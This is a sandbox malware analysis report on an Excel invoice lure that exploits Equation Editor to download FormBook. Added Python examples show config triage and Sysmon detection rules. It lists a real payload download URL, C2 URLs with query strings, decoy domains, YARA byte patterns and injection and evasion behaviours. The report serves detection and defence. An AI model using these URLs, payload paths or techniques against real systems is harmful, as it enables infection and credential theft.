
Windows Analysis Report
DL03327INV.xlsx

Overview

General Information

Sample Name: DL03327INV.xlsx
Analysis ID: 626601
MD5: 5b4a67ac532a5d8900b815144f0fb845
SHA1: 6da306004e084780e9f57f3702a5ec22e72fff6c
SHA256: 98fc7157dafde651c3ab515663e3a91f034b49175e2e2495c00576c4b8e9e96d
Tags: VelvetSweatshop, xlsx (the VelvetSweatshop tag marks a workbook encrypted with Excel's built-in default password; Excel decrypts such files without prompting, while a static scanner that does not try that key sees only an encrypted container)

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2776 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2364 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2172 cmdline: "C:\Users\Public\vbc.exe" MD5: DE76EF6A11A63EFC00B0303888BC0B7F)
      • yldnat.exe (PID: 1148 cmdline: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna MD5: BC3C746DB1D3F8A821BBDF17CA023450)
        • yldnat.exe (PID: 2452 cmdline: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna MD5: BC3C746DB1D3F8A821BBDF17CA023450)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • wuapp.exe (PID: 1112 cmdline: C:\Windows\SysWOW64\wuapp.exe MD5: C8EBA45CEF271BED6C2F0E1965D229EA)
              • cmd.exe (PID: 2960 cmdline: /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup
{"C2 list": ["www.arjimni.com/nc39/"], "decoy": ["bohicaapparel.com", "chilliesofwoodstock.com", "szcipa.com", "nirmalaswagruhafoods.com", "orbitas.online", "bjvxx.com", "atomvpn.site", "thecanvacoach.com", "thewhitelounge.com", "trwebz.xyz", "yiwanggkm.com", "maggiceden-io.com", "kimyanindelisi.online", "xn--e02b19uo0j.com", "kaola74.top", "klcsales.net", "renacerdevteam.com", "talkmoor.com", "seobusinesslistings.com", "contractornurd.com", "wolksquit.com", "hamiltonspringfield.com", "skinclash.com", "d-web.net", "tige03.xyz", "thereeldecoy.com", "dutyapparel.com", "vicentedotorarquitectos.com", "bensdrywall.com", "domainnetwoks.com", "incorrectbenevolence.com", "ramvadher.space", "dbluvt.xyz", "laps-clicks.com", "thewattelectric.com", "fogpromo.com", "ibcfitting.com", "get25000today.com", "do-hobbies-indoors.com", "marmagdistribuciones.com", "newworldtongpaihotels.net", "3astratford.com", "tocarrythemessage.com", "57shasha.club", "117colgett.com", "captainnoclue.com", "rapejesus.site", "grandas-svoboda.com", "apartmentpermis.com", "greatco.biz", "joneswoodworks.com", "lilatoons.com", "banalto.com", "caycilargida.online", "gangez.com", "tw-life.net", "treasuresofjudaica.com", "monin.one", "earthdefense.global", "troolygood.com", "eafc.tech", "southcarolinawire.xyz", "designstatussupport.com", "moorblaque.com"]}
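The configuration above lists one C2 URL and 64 decoy domains. FormBook contacts decoys alongside its real C2 so that traffic analysis cannot single the C2 out, and the decoys are frequently legitimate sites, so only the C2 entry is a safe blocking indicator. The following added example (not part of the Joe Sandbox report or of any Joe Security tooling) parses the configuration, labels the domains the sample actually resolved, and derives the indicators that can be blocked. CONFIG_JSON is an abbreviated copy of the configuration shown above (the C2 plus six of the 64 decoys); OBSERVED_DNS is constructed from the report's "Domain query" lines further down.

```python
"""Triage a FormBook configuration against the domains the sample resolved.

Added example; not part of the Joe Sandbox report or of Joe Security tooling.
CONFIG_JSON abbreviates the extracted configuration (the C2 entry and six of
the 64 decoys). OBSERVED_DNS is constructed from the report's explorer.exe
"Domain query" lines.
"""
import json

CONFIG_JSON = """
{"C2 list": ["www.arjimni.com/nc39/"],
 "decoy": ["bohicaapparel.com", "contractornurd.com", "tw-life.net",
           "yiwanggkm.com", "d-web.net", "monin.one"]}
"""

# Names explorer.exe resolved during the run (constructed from the report).
OBSERVED_DNS = ["www.arjimni.com", "www.tw-life.net",
                "www.contractornurd.com", "www.yiwanggkm.com"]


def strip_www(host: str) -> str:
    """Normalise a hostname: lower-case, no trailing dot, no leading 'www.'."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def parse_c2_entry(entry: str):
    """'www.arjimni.com/nc39/' -> ('www.arjimni.com', '/nc39/'); any scheme is dropped."""
    entry = entry.split("://", 1)[-1]
    host, _, path = entry.partition("/")
    return host.lower(), "/" + path


def parse_config(raw: str) -> dict:
    cfg = json.loads(raw)
    c2 = [parse_c2_entry(e) for e in cfg.get("C2 list", [])]
    return {
        "c2_hosts": {h for h, _ in c2},
        "c2_paths": {p for _, p in c2},
        "decoys": {strip_www(d) for d in cfg.get("decoy", [])},
    }


def classify_queries(config: dict, queries) -> dict:
    """Label each resolved name as the real C2, a configured decoy, or unrelated."""
    c2_bare = {strip_www(h) for h in config["c2_hosts"]}
    labels = {}
    for q in queries:
        bare = strip_www(q)
        if bare in c2_bare:
            labels[q] = "c2"
        elif bare in config["decoys"]:
            labels[q] = "decoy"
        else:
            labels[q] = "unknown"
    return labels


def block_indicators(config: dict) -> dict:
    """Indicators safe to block: the C2 host (with and without www) and its URI path.

    Decoy domains are deliberately left out: FormBook chooses them to look like
    ordinary traffic and several may belong to real businesses."""
    domains = set()
    for h in config["c2_hosts"]:
        domains.add(strip_www(h))
        domains.add("www." + strip_www(h))
    return {"domains": sorted(domains), "uri_paths": sorted(config["c2_paths"])}


if __name__ == "__main__":
    cfg = parse_config(CONFIG_JSON)
    for host, label in classify_queries(cfg, OBSERVED_DNS).items():
        print(f"{host:28s} {label}")
    print(block_indicators(cfg))
```

Run against the four names the sample resolved, only www.arjimni.com comes back as "c2"; the other three are configured decoys, which is why a blocklist built from "every domain the sandbox saw" would be both noisy and partly wrong.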
Source | Rule | Description | Author (matched strings listed beneath each row)

00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8bb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8f42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x162e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15d91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x163e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1655f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x995a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1500c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa6d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b947:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ca4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x187c9:$sqlite3step: 68 34 1C 7B E1
  • 0x188dc:$sqlite3step: 68 34 1C 7B E1
  • 0x187f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1891d:$sqlite3text: 68 38 2A 90 C5
  • 0x1880b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18933:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8bb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8f42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x162e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15d91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x163e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1655f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x995a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1500c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa6d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b947:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ca4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(the report lists 28 memory-dump entries; the remainder are not reproduced here)

Source | Rule | Description | Author (matched strings listed beneath each row)

6.0.yldnat.exe.400000.9.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.0.yldnat.exe.400000.9.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8bb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8f42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x162e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15d91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x163e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1655f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x995a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1500c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa6d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b947:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ca4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.0.yldnat.exe.400000.9.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x187c9:$sqlite3step: 68 34 1C 7B E1
  • 0x188dc:$sqlite3step: 68 34 1C 7B E1
  • 0x187f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1891d:$sqlite3text: 68 38 2A 90 C5
  • 0x1880b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18933:$sqlite3blob: 68 53 D8 7F 8C
6.2.yldnat.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.yldnat.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7db8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8142:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x154e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14f91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x155e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1575f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x8b5a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1420c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x98d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab47:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bc4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(the report lists 20 unpacked-PE entries; the remainder are not reproduced here)

Note on the matched strings: $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) disassembles to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the timing check behind the "Tries to detect virtualization through RDTSC time measurements" signature above. The JPCERT $sqlite3* strings are push imm32 instructions (68 xx xx xx xx) whose immediates the rule associates with sqlite3_step, sqlite3_column_text and sqlite3_column_blob lookups. The same sequences hit at offsets exactly 0xE00 apart in the .raw.unpack and .unpack views of pid 6, which is the same code seen at file offsets versus virtual addresses.

          Exploits

Sigma matches (Sysmon events, author Joe Security):
  Network Connection (EventID 3): Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2364, Protocol: tcp, Initiated: true, SourceIp: 192.168.2.22 (SourceIsIpv6: false), SourcePort: 49173, DestinationIp: 104.168.33.31 (DestinationIsIpv6: false), DestinationPort: 80
  File created (EventID 11): Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2364, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

Snort IDS alerts (all TCP; Classtype: A Network Trojan was detected):
  Timestamp | Source | Destination | SID
  05/14/22-15:20:54.628198 | 192.168.2.22:49175 | 198.54.117.212:80 | 2031412
  05/14/22-15:20:54.628198 | 192.168.2.22:49175 | 198.54.117.212:80 | 2031453
  05/14/22-15:20:54.628198 | 192.168.2.22:49175 | 198.54.117.212:80 | 2031449
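The two Sysmon events above (EQNEDT32.EXE opening a TCP connection, EQNEDT32.EXE writing a file) plus the process tree (EQNEDT32.EXE starting C:\Users\Public\vbc.exe) are the three behaviours the Sigma rules in the signature list key on. As an added example, not Joe Sandbox's or the Sigma project's own code, the following script evaluates those three detections over Sysmon-shaped events. The events are constructed from the report; the rule names, severities and the two benign control events (Equation Editor being started by COM, and svchost.exe connecting out) are this example's own.

```python
"""Sigma-style detections for Equation Editor (EQNEDT32.EXE) abuse over Sysmon events.

Added example; it is not Joe Sandbox's or the Sigma project's own code. The
events are constructed from the report: the process tree (EQNEDT32.EXE pid 2364
starting C:\\Users\\Public\\vbc.exe), the EventID 3 network connection and the
EventID 11 file create quoted above. Field names follow Sysmon's schema; the
rule names, severities and the two control events are this example's own.
"""
from typing import Dict, List, Optional

EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

EVENTS: List[Dict] = [
    # Control: Equation Editor started by COM with -Embedding, its normal launch path.
    {"EventID": 1, "ProcessId": 2364, "Image": EQNEDT32,
     "CommandLine": '"' + EQNEDT32 + '" -Embedding',
     "ParentImage": r"C:\Windows\System32\svchost.exe", "ParentProcessId": 600},
    # From the report: EQNEDT32.EXE opens a TCP connection to the download host.
    {"EventID": 3, "ProcessId": 2364, "Image": EQNEDT32, "Protocol": "tcp",
     "Initiated": True, "SourceIp": "192.168.2.22", "SourcePort": 49173,
     "DestinationIp": "104.168.33.31", "DestinationPort": 80},
    # From the report: the download lands in the Internet Explorer cache.
    {"EventID": 11, "ProcessId": 2364, "Image": EQNEDT32,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe"},
    # From the process tree: EQNEDT32.EXE launches the dropped payload.
    {"EventID": 1, "ProcessId": 2172, "Image": r"C:\Users\Public\vbc.exe",
     "CommandLine": r'"C:\Users\Public\vbc.exe"',
     "ParentImage": EQNEDT32, "ParentProcessId": 2364},
    # Control: a service process connecting out, which must not fire.
    {"EventID": 3, "ProcessId": 600, "Image": r"C:\Windows\System32\svchost.exe",
     "Protocol": "tcp", "Initiated": True, "SourceIp": "192.168.2.22",
     "SourcePort": 49180, "DestinationIp": "13.107.4.50", "DestinationPort": 443},
]

EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".com", ".pif", ".cpl",
                       ".js", ".vbs", ".ps1", ".bat", ".cmd", ".hta")


def is_eqnedt32(image: str) -> bool:
    # Match on the image name only: the install path differs across Office versions.
    return image.lower().endswith("\\eqnedt32.exe")


def rule_child_process(ev: Dict) -> Optional[Dict]:
    """Equation Editor has no legitimate reason to start other programs."""
    if ev.get("EventID") == 1 and is_eqnedt32(ev.get("ParentImage", "")):
        return {"level": "high", "eqnedt32_pid": ev["ParentProcessId"],
                "detail": ev.get("CommandLine", ev.get("Image", ""))}
    return None


def rule_network_connection(ev: Dict) -> Optional[Dict]:
    """Equation Editor never initiates network connections on its own."""
    if (ev.get("EventID") == 3 and is_eqnedt32(ev.get("Image", ""))
            and ev.get("Initiated") in (True, "true")):
        return {"level": "high", "eqnedt32_pid": ev["ProcessId"],
                "detail": f"{ev['DestinationIp']}:{ev['DestinationPort']}/{ev['Protocol']}"}
    return None


def rule_file_dropped(ev: Dict) -> Optional[Dict]:
    """Any file written by Equation Editor is suspect; executables are critical."""
    if ev.get("EventID") == 11 and is_eqnedt32(ev.get("Image", "")):
        target = ev.get("TargetFilename", "")
        level = "critical" if target.lower().endswith(EXECUTABLE_SUFFIXES) else "medium"
        return {"level": level, "eqnedt32_pid": ev["ProcessId"], "detail": target}
    return None


RULES = [
    ("EQNEDT32 spawns child process", rule_child_process),
    ("EQNEDT32 network connection", rule_network_connection),
    ("EQNEDT32 file dropped", rule_file_dropped),
]


def evaluate(events: List[Dict]) -> List[Dict]:
    """Run every rule over every event; return alerts in event order."""
    alerts = []
    for ev in events:
        for name, rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append({"rule": name, **hit})
    return alerts


if __name__ == "__main__":
    for alert in evaluate(EVENTS):
        print(f"[{alert['level']}] {alert['rule']} (pid {alert['eqnedt32_pid']}): {alert['detail']}")
```

The -Embedding launch of EQNEDT32.EXE itself produces no alert: that is how the COM runtime starts Equation Editor whenever an embedded equation object is activated, so the useful signal is what the process does afterwards, and all three rules pin the alert to the Equation Editor's own pid (2364 here) so the hits correlate in a SIEM.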


          AV Detection

          Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.arjimni.com/nc39/"], "decoy": ["bohicaapparel.com", "chilliesofwoodstock.com", "szcipa.com", "nirmalaswagruhafoods.com", "orbitas.online", "bjvxx.com", "atomvpn.site", "thecanvacoach.com", "thewhitelounge.com", "trwebz.xyz", "yiwanggkm.com", "maggiceden-io.com", "kimyanindelisi.online", "xn--e02b19uo0j.com", "kaola74.top", "klcsales.net", "renacerdevteam.com", "talkmoor.com", "seobusinesslistings.com", "contractornurd.com", "wolksquit.com", "hamiltonspringfield.com", "skinclash.com", "d-web.net", "tige03.xyz", "thereeldecoy.com", "dutyapparel.com", "vicentedotorarquitectos.com", "bensdrywall.com", "domainnetwoks.com", "incorrectbenevolence.com", "ramvadher.space", "dbluvt.xyz", "laps-clicks.com", "thewattelectric.com", "fogpromo.com", "ibcfitting.com", "get25000today.com", "do-hobbies-indoors.com", "marmagdistribuciones.com", "newworldtongpaihotels.net", "3astratford.com", "tocarrythemessage.com", "57shasha.club", "117colgett.com", "captainnoclue.com", "rapejesus.site", "grandas-svoboda.com", "apartmentpermis.com", "greatco.biz", "joneswoodworks.com", "lilatoons.com", "banalto.com", "caycilargida.online", "gangez.com", "tw-life.net", "treasuresofjudaica.com", "monin.one", "earthdefense.global", "troolygood.com", "eafc.tech", "southcarolinawire.xyz", "designstatussupport.com", "moorblaque.com"]}
Source: DL03327INV.xlsx | Virustotal: Detection: 38%
Source: DL03327INV.xlsx | ReversingLabs: Detection: 26%
Source: Yara match | File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: www.arjimni.com/nc39/ | Avira URL Cloud: Label: malware
Source: http://www.arjimni.com/nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh | Avira URL Cloud: Label: malware
Source: http://104.168.33.31/75/vbc.exe | Avira URL Cloud: Label: malware
Source: http://www.contractornurd.com/nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | ReversingLabs: Detection: 51%
Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 51%
Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | Joe Sandbox ML: detected
Source: 6.2.yldnat.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.yldnat.exe.120000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.3.EQNEDT32.EXE.6af7ba.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.yldnat.exe.400000.9.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.yldnat.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.yldnat.exe.400000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 104.168.33.31 Port: 80
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
EQNEDT32.EXE is started by the COM runtime (hence the -Embedding switch and the "unknown" parent) when Excel activates the embedded Equation object; the exploit then runs inside that process, which is why the download, the dropped file and the child process vbc.exe are all attributed to EQNEDT32.EXE rather than to EXCEL.EXE.
          Source: Binary string: C:\zjary\jjvucn\mxni\b98fa234680046ddacdf27145f9ff7b1\qjcbwv\ygyntjah\Release\ygyntjah.pdb source: vbc.exe, 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp, yldnat.exe, 00000005.00000000.976220140.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000006.00000000.982290199.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1176125071.0000000002397000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175572763.0000000000352000.00000004.00000020.00020000.00000000.sdmp, nss8A2D.tmp.4.dr, yldnat.exe.4.dr
          Source: Binary string: wntdll.pdb source: yldnat.exe, yldnat.exe, 00000006.00000003.985070971.00000000006C0000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032618043.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000003.983271572.0000000000560000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000003.1032134115.0000000000780000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175921231.0000000002010000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.1033412733.0000000001D00000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: yldnat.exe, 00000006.00000002.1031989955.0000000000030000.00000040.10000000.00040000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032320172.0000000000484000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B

          Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D04FF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D052D ShellExecuteW,ExitProcess, 2_2_036D052D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D0494 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D0494
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D03EF ExitProcess, 2_2_036D03EF
